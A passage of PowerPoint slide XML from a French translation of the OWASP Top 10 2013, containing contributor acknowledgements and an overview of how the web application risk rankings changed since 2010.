                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>WebInspect</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>)</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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t>Minded</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId14"/>
                        </a:rPr>
                        <a:t> Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>Statistiques</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>Softtek</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId17"/>
                        </a:rPr>
                        <a:t>Statistiques</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>TrustWave, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:hlinkClick r:id="rId18"/>
                        </a:rPr>
                        <a:t>SpiderLabs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId19"/>
                        </a:rPr>
                        <a:t>Statistiques</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> (voir page 50)</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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId20"/>
                        </a:rPr>
                        <a:t>Veracode</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId21"/>
                        </a:rPr>
                        <a:t>Statistiques</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId22"/>
                        </a:rPr>
                        <a:t>WhiteHat Security Inc.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> – </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId23"/>
                        </a:rPr>
                        <a:t>Statistiques</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>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r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Nous tenons également à remercier toutes les personnes ayant contribué aux versions précédentes du Top 10, sans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> lesquelles , il ne serait pas ce qu’il est aujourd’hui. Sans oublier ceux ayant contribué par leur contenu significatif ou la relecture de cette version 2013:</a:t>
                      </a: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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>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fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Adam </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Baso</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Wikimedia</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Foundation</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>)</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fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Mike </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Boberski</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (Booz Allen Hamilton)</a:t>
                      </a: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fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Torsten </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Gigler</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="346075" marR="0" lvl="1" indent="-117475" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                        <a:buChar char="§"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Neil </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Smithline</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> (</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>MorphoTrust</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> USA) – pour la version wiki et ses commentaires.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                        <a:hlinkClick r:id="rId24"/>
                      </a:endParaRP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fr-FR" sz="1000" u="sng" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text Placeholder 10"/>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fr-FR" smtClean="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Title 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Introduction</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 3" descr="S:\P4\aspect\business_development\Graphics\Logos\Aspect Logo Black Alpha 150x35.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId25" cstate="print">
            <a:extLst>
              <a:ext uri="{BEBA8EAE-BF5A-486C-A8C5-ECC9F3942E4B}">
                <a14:imgProps xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a14:imgLayer r:embed="rId26">
                    <a14:imgEffect>
                      <a14:brightnessContrast bright="-20000" contrast="-40000"/>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4736552"/>
            <a:ext cx="2057400" cy="489204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3339727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3312438"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1143000"/>
          <a:ext cx="6858000" cy="4358640"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Ce</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> qui a changé de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2010 à 2013</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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395204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baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>paysage</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> des menaces des applications de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>sécurité</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>évolue</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>constamment</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Les facteurs clé de cette évolution </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>ont les progrès réalisés</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> par les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>attaquants</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>l’émergence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>de nouvelles technologies avec de nouvelles faiblesses, ainsi que des défenses plus intégrées, et le déploiement de systèmes de plus en plus complexes. Pour suivre le rythme, nous mettons périodiquement à jour le Top 10 de l'OWASP. Dans cette version 2013, nous avons apporté les modifications suivantes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>:</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buAutoNum type="arabicParenR"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>La violation de gestion d’authentification et de session est plus répandue selon notre échantillon. Probablement parce que ce domaine est plus étudié, et non du fait de problèmes plus répandus. Les risques A2 et A3 changent donc de place.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buAutoNum type="arabicParenR"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>La falsification de requête intersites (CSRF), à prédominance moins répandue dans notre référentiel, rétrograde de 2010-A5 à 2013-A8. Nous pensons que les entreprises et les développeurs ont</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> significativement réduit </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>le nombre de vulnérabilités CSRF dans leurs applications du fait de sa présence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>dans le Top 10 OWASP depuis 6 ans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buAutoNum type="arabicParenR"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Nous avons élargi le Manque de restriction d’accès à une URL du Top 10 d’OWASP 2010 afin d’être plus complet:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="457200" marR="0" lvl="1" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Calibri" pitchFamily="34" charset="0"/>
                        <a:buChar char="+"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2010-A8: Manque de restriction d’accès à une URL est désormais, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A7: Manque de contrôle d’accès au niveau fonctionnel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> – pour couvrir tous les contrôles d’accès au niveau fonctionnel. Il existe de nombreuses manières de définir quelle fonctionnalité doit être accédée, pas seulement l’URL. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="228600" marR="0" indent="-228600" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="200"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="200"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buAutoNum type="arabicParenR"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Nous avons fusionné et élargi </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2010-A7 et 2010-A9 pour CREER: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" u="sng" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>2013-A6: Exposition de données sensibles.</a:t>
                      </a:r>
